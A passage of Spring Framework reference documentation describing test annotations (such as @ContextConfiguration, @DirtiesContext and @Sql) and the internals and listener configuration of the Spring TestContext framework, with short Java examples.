integration tests that interact with a database. For\ndetails, see <<jdbc-embedded-database-support>> and\n<<jdbc-embedded-database-dao-testing>>.\n\n\n\n[[integration-testing-annotations]]\n=== Annotations\n\n\n[[integration-testing-annotations-spring]]\n==== Spring Testing Annotations\nThe Spring Framework provides the following set of __Spring-specific__ annotations that\nyou can use in your unit and integration tests in conjunction with the TestContext\nframework. Refer to the corresponding javadocs for further information, including\ndefault attribute values, attribute aliases, and so on.\n\n* `@ContextConfiguration`\n\n+\n\nDefines class-level metadata that is used to determine how to load and configure an\n`ApplicationContext` for integration tests. Specifically, `@ContextConfiguration`\ndeclares the application context resource `locations` or the annotated `classes`\nthat will be used to load the context.\n\n+\n\nResource locations are typically XML configuration files or Groovy scripts located in\nthe classpath; whereas, annotated classes are typically `@Configuration` classes. However,\nresource locations can also refer to files and scripts in the file system, and annotated\nclasses can be component classes, etc.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(\"\/test-config.xml\")\n\tpublic class XmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**classes** = TestConfig.class)\n\tpublic class ConfigClassApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nAs an alternative or in addition to declaring resource locations or annotated classes,\n`@ContextConfiguration` may be used to declare `ApplicationContextInitializer` classes.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**initializers** = CustomContextIntializer.class)\n\tpublic class ContextInitializerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n`@ContextConfiguration` may optionally be used to declare the `ContextLoader` strategy\nas well. Note, however, that you typically do not need to explicitly configure the\nloader since the default loader supports either resource `locations` or annotated\n`classes` as well as `initializers`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**locations** = \"\/test-context.xml\", **loader** = CustomContextLoader.class)\n\tpublic class CustomLoaderXmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[NOTE]\n====\n`@ContextConfiguration` provides support for __inheriting__ resource locations or\nconfiguration classes as well as context initializers declared by superclasses by\ndefault.\n====\n\n+\n\nSee <<testcontext-ctx-management>> and the `@ContextConfiguration` javadocs for\nfurther details.\n\n* `@WebAppConfiguration`\n\n+\n\nA class-level annotation that is used to declare that the `ApplicationContext` loaded\nfor an integration test should be a `WebApplicationContext`. The mere presence of\n`@WebAppConfiguration` on a test class ensures that a `WebApplicationContext` will be\nloaded for the test, using the default value of `\"file:src\/main\/webapp\"` for the path to\nthe root of the web application (i.e., the __resource base path__). The resource base\npath is used behind the scenes to create a `MockServletContext` which serves as the\n`ServletContext` for the test's `WebApplicationContext`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nTo override the default, specify a different base resource path via the __implicit__\n`value` attribute. Both `classpath:` and `file:` resource prefixes are supported. If no\nresource prefix is supplied the path is assumed to be a file system resource.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration(\"classpath:test-web-resources\")**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nNote that `@WebAppConfiguration` must be used in conjunction with\n`@ContextConfiguration`, either within a single test class or within a test class\nhierarchy. See the `@WebAppConfiguration` javadocs for further details.\n\n+\n\n* `@ContextHierarchy`\n\n+\n\nA class-level annotation that is used to define a hierarchy of ++ApplicationContext++s\nfor integration tests. `@ContextHierarchy` should be declared with a list of one or more\n`@ContextConfiguration` instances, each of which defines a level in the context\nhierarchy. The following examples demonstrate the use of `@ContextHierarchy` within a\nsingle test class; however, `@ContextHierarchy` can also be used within a test class\nhierarchy.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class ContextHierarchyTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = AppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class WebIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nIf you need to merge or override the configuration for a given level of the context\nhierarchy within a test class hierarchy, you must explicitly name that level by\nsupplying the same value to the `name` attribute in `@ContextConfiguration` at each\ncorresponding level in the class hierarchy. See\n<<testcontext-ctx-management-ctx-hierarchies>> and the `@ContextHierarchy` javadocs\nfor further examples.\n\n* `@ActiveProfiles`\n\n+\n\nA class-level annotation that is used to declare which __bean definition profiles__\nshould be active when loading an `ApplicationContext` for test classes.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**(\"dev\")\n\tpublic class DeveloperTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**({\"dev\", \"integration\"})\n\tpublic class DeveloperIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[NOTE]\n====\n`@ActiveProfiles` provides support for __inheriting__ active bean definition profiles\ndeclared by superclasses by default. It is also possible to resolve active bean\ndefinition profiles programmatically by implementing a custom\n<<testcontext-ctx-management-env-profiles-ActiveProfilesResolver,`ActiveProfilesResolver`>>\nand registering it via the `resolver` attribute of `@ActiveProfiles`.\n====\n\n+\n\nSee <<testcontext-ctx-management-env-profiles>> and the `@ActiveProfiles` javadocs\nfor examples and further details.\n\n* `@TestPropertySource`\n\n+\n\nA class-level annotation that is used to configure the locations of properties files and\ninlined properties to be added to the set of `PropertySources` in the `Environment` for\nan `ApplicationContext` loaded for an integration test.\n\n+ \n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\n+\n\nThe following example demonstrates how to declare a properties file from the classpath.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nThe following example demonstrates how to declare _inlined_ properties.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(properties = { \"timezone = GMT\", \"port: 4242\" })\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n* `@DirtiesContext`\n\n+\n\nIndicates that the underlying Spring `ApplicationContext` has been __dirtied__ during\nthe execution of a test (i.e., modified or corrupted in some manner -- for example, by\nchanging the state of a singleton bean) and should be closed. When an application\ncontext is marked __dirty__, it is removed from the testing framework's cache and\nclosed. As a consequence, the underlying Spring container will be rebuilt for any\nsubsequent test that requires a context with the same configuration metadata.\n\n+\n\n`@DirtiesContext` can be used as both a class-level and method-level annotation within\nthe same class or class hierarchy. In such scenarios, the `ApplicationContext` is marked\nas __dirty__ before or after any such annotated method as well as before or after the\ncurrent test class, depending on the configured `methodMode` and `classMode`.\n\n+\n\nThe following examples explain when the context would be dirtied for various\nconfiguration scenarios:\n\n+\n\n** Before the current test class, when declared on a class with class mode set to\n`BEFORE_CLASS`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_CLASS)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n** After the current test class, when declared on a class with class mode set to\n`AFTER_CLASS` (i.e., the default class mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n** Before each test method in the current test class, when declared on a class with class\nmode set to `BEFORE_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_EACH_TEST_METHOD)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n** After each test method in the current test class, when declared on a class with class\nmode set to `AFTER_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = AFTER_EACH_TEST_METHOD)**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n** Before the current test, when declared on a method with the method mode set to\n`BEFORE_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(methodMode = BEFORE_METHOD)**\n\t@Test\n\tpublic void testProcessWhichRequiresFreshAppCtx() {\n\t\t\/\/ some logic that requires a new Spring container\n\t}\n----\n\n+\n\n** After the current test, when declared on a method with the method mode set to\n`AFTER_METHOD` (i.e., the default method mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\t@Test\n\tpublic void testProcessWhichDirtiesAppCtx() {\n\t\t\/\/ some logic that results in the Spring container being dirtied\n\t}\n----\n\n+\n\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy via `@ContextHierarchy`, the `hierarchyMode` flag can be used to control how\nthe context cache is cleared. By default an __exhaustive__ algorithm will be used that\nclears the context cache including not only the current level but also all other context\nhierarchies that share an ancestor context common to the current test; all\n++ApplicationContext++s that reside in a sub-hierarchy of the common ancestor context\nwill be removed from the context cache and closed. If the __exhaustive__ algorithm is\noverkill for a particular use case, the simpler __current level__ algorithm can be\nspecified instead, as seen below.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class BaseTests {\n\t\t\/\/ class body...\n\t}\n\n\tpublic class ExtendedTests extends BaseTests {\n\n\t\t@Test\n\t\t@DirtiesContext(**hierarchyMode = CURRENT_LEVEL**)\n\t\tpublic void test() {\n\t\t\t\/\/ some logic that results in the child context being dirtied\n\t\t}\n\t}\n----\n\n+\n\nFor further details regarding the `EXHAUSTIVE` and `CURRENT_LEVEL` algorithms see the\n`DirtiesContext.HierarchyMode` javadocs.\n\n* `@TestExecutionListeners`\n\n+\n\nDefines class-level metadata for configuring which ++TestExecutionListener++s should be\nregistered with the `TestContextManager`. Typically, `@TestExecutionListeners` is used\nin conjunction with `@ContextConfiguration`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestExecutionListeners**({CustomTestExecutionListener.class, AnotherTestExecutionListener.class})\n\tpublic class CustomTestExecutionListenerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n`@TestExecutionListeners` supports __inherited__ listeners by default. See the javadocs\nfor an example and further details.\n\n+\n\n* `@Commit`\n\n+\n\nIndicates that the transaction for a transactional test method should be __committed__\nafter the test method has completed. `@Commit` can be used as a direct replacement for\n`@Rollback(false)` in order to more explicitly convey the intent of the code. Analogous to\n`@Rollback`, `@Commit` may also be declared as a class-level or method-level annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Commit**\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n* `@Rollback`\n\n+\n\nIndicates whether the transaction for a transactional test method should be __rolled\nback__ after the test method has completed. If `true`, the transaction is rolled back;\notherwise, the transaction is committed (see also `@Commit`). Rollback semantics for\nintegration tests in the Spring TestContext Framework default to `true` even if\n`@Rollback` is not explicitly declared.\n\n+\n\nWhen declared as a class-level annotation, `@Rollback` defines the default rollback\nsemantics for all test methods within the test class hierarchy. When declared as a\nmethod-level annotation, `@Rollback` defines rollback semantics for the specific test\nmethod, potentially overriding class-level `@Rollback` or `@Commit` semantics.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Rollback**(false)\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n* `@BeforeTransaction`\n\n+\n\nIndicates that the annotated `void` method should be executed __before__ a\ntransaction is started for test methods configured to run within a transaction via the\n`@Transactional` annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@BeforeTransaction**\n\tvoid beforeTransaction() {\n\t\t\/\/ logic to be executed before a transaction is started\n\t}\n----\n\n* `@AfterTransaction`\n\n+\n\nIndicates that the annotated `void` method should be executed __after__ a\ntransaction has ended for test methods configured to run within a transaction via the\n`@Transactional` annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@AfterTransaction**\n\tvoid afterTransaction() {\n\t\t\/\/ logic to be executed after a transaction has ended\n\t}\n----\n\n* `@Sql`\n\n+\n\nUsed to annotate a test class or test method to configure SQL scripts to be executed\nagainst a given database during integration tests.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@Sql**({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\tpublic void userTest {\n\t\t\/\/ execute code that relies on the test schema and test data\n\t}\n----\n\n+\n\nSee <<testcontext-executing-sql-declaratively>> for further details.\n\n* `@SqlConfig`\n\n+\n\nDefines metadata that is used to determine how to parse and execute SQL scripts\nconfigured via the `@Sql` annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"\/test-user-data.sql\",\n\t\tconfig = **@SqlConfig**(commentPrefix = \"`\", separator = \"@@\")\n\t)\n\tpublic void userTest {\n\t\t\/\/ execute code that relies on the test data\n\t}\n----\n\n* `@SqlGroup`\n\n+\n\nA container annotation that aggregates several `@Sql` annotations. Can be used natively,\ndeclaring several nested `@Sql` annotations. Can also be used in conjunction with Java\n8's support for repeatable annotations, where `@Sql` can simply be declared several times\non the same class or method, implicitly generating this container annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@SqlGroup**({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t)}\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n\n[[integration-testing-annotations-standard]]\n==== Standard Annotation Support\nThe following annotations are supported with standard semantics for all configurations\nof the Spring TestContext Framework. Note that these annotations are not specific to\ntests and can be used anywhere in the Spring Framework.\n\n* `@Autowired`\n* `@Qualifier`\n* `@Resource` (javax.annotation) _if JSR-250 is present_\n* `@Inject` (javax.inject) _if JSR-330 is present_\n* `@Named` (javax.inject) _if JSR-330 is present_\n* `@PersistenceContext` (javax.persistence) _if JPA is present_\n* `@PersistenceUnit` (javax.persistence) _if JPA is present_\n* `@Required`\n* `@Transactional`\n\n.JSR-250 Lifecycle Annotations\n[NOTE]\n====\nIn the Spring TestContext Framework `@PostConstruct` and `@PreDestroy` may be used with\nstandard semantics on any application components configured in the `ApplicationContext`;\nhowever, these lifecycle annotations have limited usage within an actual test class.\n\nIf a method within a test class is annotated with `@PostConstruct`, that method will be\nexecuted before any __before__ methods of the underlying test framework (e.g., methods\nannotated with JUnit's `@Before`), and that will apply for every test method in the test\nclass. On the other hand, if a method within a test class is annotated with\n`@PreDestroy`, that method will __never__ be executed. Within a test class it is\ntherefore recommended to use test lifecycle callbacks from the underlying test framework\ninstead of `@PostConstruct` and `@PreDestroy`.\n====\n\n\n[[integration-testing-annotations-junit]]\n==== Spring JUnit Testing Annotations\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit4-runner,SpringRunner>>, <<testcontext-junit4-rules,Spring's JUnit\nrules>>, or <<testcontext-support-classes-junit4,Spring's JUnit support classes>>.\n\n* `@IfProfileValue`\n\n+\n\nIndicates that the annotated test is enabled for a specific testing environment. If the\nconfigured `ProfileValueSource` returns a matching `value` for the provided `name`, the\ntest is enabled. Otherwise, the test will be disabled and effectively _ignored_.\n\n+\n\n`@IfProfileValue` can be applied at the class level, the method level, or both.\nClass-level usage of `@IfProfileValue` takes precedence over method-level usage for any\nmethods within that class or its subclasses. Specifically, a test is enabled if it is\nenabled both at the class level _and_ at the method level; the absence of\n`@IfProfileValue` means the test is implicitly enabled. This is analogous to the\nsemantics of JUnit's `@Ignore` annotation, except that the presence of `@Ignore` always\ndisables a test.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"java.vendor\", **value**=\"Oracle Corporation\")\n\t@Test\n\tpublic void testProcessWhichRunsOnlyOnOracleJvm() {\n\t\t\/\/ some logic that should run only on Java VMs from Oracle Corporation\n\t}\n----\n\n+\n\nAlternatively, you can configure `@IfProfileValue` with a list of `values` (with __OR__\nsemantics) to achieve TestNG-like support for __test groups__ in a JUnit environment.\nConsider the following example:\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"test-groups\", **values**={\"unit-tests\", \"integration-tests\"})\n\t@Test\n\tpublic void testProcessWhichRunsForUnitOrIntegrationTestGroups() {\n\t\t\/\/ some logic that should run only for unit and integration test groups\n\t}\n----\n\n+\n\n* `@ProfileValueSourceConfiguration`\n\n+\n\nClass-level annotation that specifies what type of `ProfileValueSource` to use when\nretrieving __profile values__ configured through the `@IfProfileValue` annotation. If\n`@ProfileValueSourceConfiguration` is not declared for a test,\n`SystemProfileValueSource` is used by default.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ProfileValueSourceConfiguration**(CustomProfileValueSource.class)\n\tpublic class CustomProfileValueSourceTests {\n\t\t\/\/ class body...\n\t}\n----\n\n* `@Timed`\n\n+\n\nIndicates that the annotated test method must finish execution in a specified time\nperiod (in milliseconds). If the text execution time exceeds the specified time period,\nthe test fails.\n\n+\n\nThe time period includes execution of the test method itself, any repetitions of the\ntest (see `@Repeat`), as well as any __set up__ or __tear down__ of the test fixture.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Timed**(millis=1000)\n\tpublic void testProcessWithOneSecondTimeout() {\n\t\t\/\/ some logic that should not take longer than 1 second to execute\n\t}\n----\n\n+\n\nSpring's `@Timed` annotation has different semantics than JUnit's `@Test(timeout=...)`\nsupport. Specifically, due to the manner in which JUnit handles test execution timeouts\n(that is, by executing the test method in a separate `Thread`), `@Test(timeout=...)`\npreemptively fails the test if the test takes too long. Spring's `@Timed`, on the other\nhand, does not preemptively fail the test but rather waits for the test to complete\nbefore failing.\n\n* `@Repeat`\n\n+\n\nIndicates that the annotated test method must be executed repeatedly. The number of\ntimes that the test method is to be executed is specified in the annotation.\n\n+\n\nThe scope of execution to be repeated includes execution of the test method itself as\nwell as any __set up__ or __tear down__ of the test fixture.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Repeat**(10)\n\t@Test\n\tpublic void testProcessRepeatedly() {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[integration-testing-annotations-meta]]\n==== Meta-Annotation Support for Testing\nSince Spring Framework 4.0, it is possible to use test-related annotations as\n<<beans-meta-annotations,meta-annotations>> in order to create custom _composed annotations_\nand reduce configuration duplication across a test suite.\n\nEach of the following may be used as meta-annotations in conjunction with the\n<<testcontext-framework,TestContext framework>>.\n\n* `@ContextConfiguration`\n* `@ContextHierarchy`\n* `@ActiveProfiles`\n* `@TestPropertySource`\n* `@DirtiesContext`\n* `@WebAppConfiguration`\n* `@TestExecutionListeners`\n* `@Transactional`\n* `@BeforeTransaction`\n* `@AfterTransaction`\n* `@Commit`\n* `@Rollback`\n* `@Sql`\n* `@SqlConfig`\n* `@SqlGroup`\n* `@Repeat`\n* `@Timed`\n* `@IfProfileValue`\n* `@ProfileValueSourceConfiguration`\n\nFor example, if we discover that we are repeating the following configuration\nacross our JUnit-based test suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_\nthat centralizes the common test configuration like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTest { }\n----\n\nThen we can use our custom `@TransactionalDevTest` annotation to simplify the\nconfiguration of individual test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTest\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTest\n\tpublic class UserRepositoryTests { }\n----\n\nFor further details, consult the <<annotation-programming-model,Spring Annotation Programming Model>>.\n\n\n[[testcontext-framework]]\n=== Spring TestContext Framework\nThe __Spring TestContext Framework__ (located in the\n`org.springframework.test.context` package) provides generic, annotation-driven unit and\nintegration testing support that is agnostic of the testing framework in use. The\nTestContext framework also places a great deal of importance on __convention over\nconfiguration__ with reasonable defaults that can be overridden through annotation-based\nconfiguration.\n\nIn addition to generic testing infrastructure, the TestContext framework provides\nexplicit support for JUnit and TestNG in the form of `abstract` support classes. For\nJUnit, Spring also provides a custom JUnit `Runner` and custom JUnit `Rules` that allow\none to write so-called __POJO test classes__. POJO test classes are not required to\nextend a particular class hierarchy.\n\nThe following section provides an overview of the internals of the TestContext\nframework. If you are only interested in using the framework and not necessarily\ninterested in extending it with your own custom listeners or custom loaders, feel free\nto go directly to the configuration (<<testcontext-ctx-management,context management>>,\n<<testcontext-fixture-di,dependency injection>>, <<testcontext-tx,transaction\nmanagement>>), <<testcontext-support-classes,support classes>>, and\n<<integration-testing-annotations,annotation support>> sections.\n\n\n[[testcontext-key-abstractions]]\n==== Key abstractions\nThe core of the framework consists of the `TestContext` and `TestContextManager` classes\nand the `TestExecutionListener`, `ContextLoader`, and `SmartContextLoader` interfaces. A\n`TestContextManager` is created on a per-test basis (e.g., for the execution of a single\ntest method in JUnit). The `TestContextManager` in turn manages a `TestContext` that\nholds the context of the current test. The `TestContextManager` also updates the state\nof the `TestContext` as the test progresses and delegates to ++TestExecutionListener++s,\nwhich instrument the actual test execution by providing dependency injection, managing\ntransactions, and so on. A `ContextLoader` (or `SmartContextLoader`) is responsible for\nloading an `ApplicationContext` for a given test class. Consult the javadocs and the\nSpring test suite for further information and examples of various implementations.\n\n* `TestContext`: Encapsulates the context in which a test is executed, agnostic of the\n actual testing framework in use, and provides context management and caching support\n for the test instance for which it is responsible. The `TestContext` also delegates to\n a `ContextLoader` (or `SmartContextLoader`) to load an `ApplicationContext` if\n requested.\n* `TestContextManager`: The main entry point into the __Spring TestContext Framework__,\n which manages a single `TestContext` and signals events to all registered\n ++TestExecutionListener++s at well-defined test execution points:\n** prior to any __before class methods__ of a particular testing framework\n** test instance preparation\n** prior to any __before methods__ of a particular testing framework\n** after any __after methods__ of a particular testing framework\n** after any __after class methods__ of a particular testing framework\n* `TestExecutionListener`: Defines a __listener__ API for reacting to test execution\n events published by the `TestContextManager` with which the listener is registered. See\n <<testcontext-tel-config>>.\n* `ContextLoader`: Strategy interface introduced in Spring 2.5 for loading an\n `ApplicationContext` for an integration test managed by the Spring TestContext\n Framework.\n\n+\n\nImplement `SmartContextLoader` instead of this interface in order to provide support for\nannotated classes, active bean definition profiles, test property sources, context\nhierarchies, and ++WebApplicationContext++s.\n\n* `SmartContextLoader`: Extension of the `ContextLoader` interface introduced in Spring\n 3.1.\n\n+\n\nThe `SmartContextLoader` SPI supersedes the `ContextLoader` SPI that was introduced in\nSpring 2.5. Specifically, a `SmartContextLoader` can choose to process resource\n`locations`, annotated `classes`, or context `initializers`. Furthermore, a\n`SmartContextLoader` can set active bean definition profiles and test property sources in\nthe context that it loads.\n\n+\n\nSpring provides the following implementations:\n\n+\n\n** `DelegatingSmartContextLoader`: one of two default loaders which delegates internally\nto an `AnnotationConfigContextLoader`, a `GenericXmlContextLoader`, or a\n`GenericGroovyXmlContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes.\nGroovy support is only enabled if Groovy is on the classpath.\n** `WebDelegatingSmartContextLoader`: one of two default loaders which delegates\ninternally to an `AnnotationConfigWebContextLoader`, a `GenericXmlWebContextLoader`, or a\n`GenericGroovyXmlWebContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes. A\nweb `ContextLoader` will only be used if `@WebAppConfiguration` is present on the test\nclass. Groovy support is only enabled if Groovy is on the classpath.\n** `AnnotationConfigContextLoader`: loads a standard `ApplicationContext` from\n__annotated classes__.\n** `AnnotationConfigWebContextLoader`: loads a `WebApplicationContext` from __annotated\nclasses__.\n** `GenericGroovyXmlContextLoader`: loads a standard `ApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n** `GenericGroovyXmlWebContextLoader`: loads a `WebApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n** `GenericXmlContextLoader`: loads a standard `ApplicationContext` from XML __resource\nlocations__.\n** `GenericXmlWebContextLoader`: loads a `WebApplicationContext` from XML __resource\nlocations__.\n** `GenericPropertiesContextLoader`: loads a standard `ApplicationContext` from Java\nProperties files.\n\nThe following sections explain how to configure the TestContext framework through\nannotations and provide working examples of how to write unit and integration tests with\nthe framework.\n\n[[testcontext-tel-config]]\n==== TestExecutionListener configuration\n\nSpring provides the following `TestExecutionListener` implementations that are registered\nby default, exactly in this order.\n\n* `ServletTestExecutionListener`: configures Servlet API mocks for a\n `WebApplicationContext`\n* `DirtiesContextBeforeModesTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _before_ modes\n* `DependencyInjectionTestExecutionListener`: provides dependency injection for the test\n instance\n* `DirtiesContextTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _after_ modes\n* `TransactionalTestExecutionListener`: provides transactional test execution with\n default rollback semantics\n* `SqlScriptsTestExecutionListener`: executes SQL scripts configured via the `@Sql`\n annotation\n\n[[testcontext-tel-config-registering-tels]]\n===== Registering custom TestExecutionListeners\n\nCustom ++TestExecutionListener++s can be registered for a test class and its subclasses\nvia the `@TestExecutionListeners` annotation. See\n<<integration-testing-annotations,annotation support>> and the javadocs for\n`@TestExecutionListeners` for details and examples.\n\n[[testcontext-tel-config-automatic-discovery]]\n===== Automatic discovery of default TestExecutionListeners\n\nRegistering custom ++TestExecutionListener++s via `@TestExecutionListeners` is suitable\nfor custom listeners that are used in limited testing scenarios; however, it can become\ncumbersome if a custom listener needs to be used across a test suite. Since Spring\nFramework 4.1, this issue is addressed via support for automatic discovery of _default_\n`TestExecutionListener` implementations via the `SpringFactoriesLoader` mechanism.\n\nSpecifically, the `spring-test` module declares all core default\n++TestExecutionListener++s under the\n`org.springframework.test.context.TestExecutionListener` key in its\n`META-INF\/spring.factories` properties file. Third-party frameworks and developers can\ncontribute their own ++TestExecutionListener++s to the list of default listeners in the\nsame manner via their own `META-INF\/spring.factories` properties file.\n\n[[testcontext-tel-config-ordering]]\n===== Ordering TestExecutionListeners\n\nWhen the TestContext framework discovers default ++TestExecutionListener++s via the\naforementioned `SpringFactoriesLoader` mechanism, the instantiated listeners are sorted\nusing Spring's `AnnotationAwareOrderComparator` which honors Spring's `Ordered` interface\nand `@Order` annotation for ordering. `AbstractTestExecutionListener` and all default\n++TestExecutionListener++s provided by Spring implement `Ordered` with appropriate\nvalues. Third-party frameworks and developers should therefore make sure that their\n_default_ ++TestExecutionListener++s are registered in the proper order by implementing\n`Ordered` or declaring `@Order`. Consult the javadocs for the `getOrder()` methods of the\ncore default ++TestExecutionListener++s for details on what values are assigned to each\ncore listener.\n\n[[testcontext-tel-config-merging]]\n===== Merging TestExecutionListeners\n\nIf a custom `TestExecutionListener` is registered via `@TestExecutionListeners`, the\n_default_ listeners will not be registered. In most common testing scenarios, this\neffectively forces the developer to manually declare all default listeners in addition to\nany custom listeners. The following listing demonstrates this style of 